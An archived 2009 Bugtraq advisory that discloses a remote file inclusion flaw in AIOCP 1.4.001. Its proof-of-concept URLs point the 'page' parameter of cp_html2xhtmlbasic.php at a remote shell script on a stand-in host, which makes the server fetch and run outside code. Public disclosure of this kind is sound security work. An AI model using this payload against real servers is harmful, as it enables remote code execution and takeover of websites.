lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20091007093514.22526.qmail@securityfocus.com> Date: 7 Oct 2009 09:35:14 -0000 From: hadikiamarsi@...mail.com To: bugtraq@...urityfocus.com Subject: Remote File Inclusion In AIOCP ########################################### # # Aiocp 1.4.001 Remote File Inclusion vulnerability # # Found by : Hadi Kiamarsi # # Contact : hadikiamarsi [at] hotmail.com # # Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download # ########################################### PoC : http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL] example : http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php local Example : http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php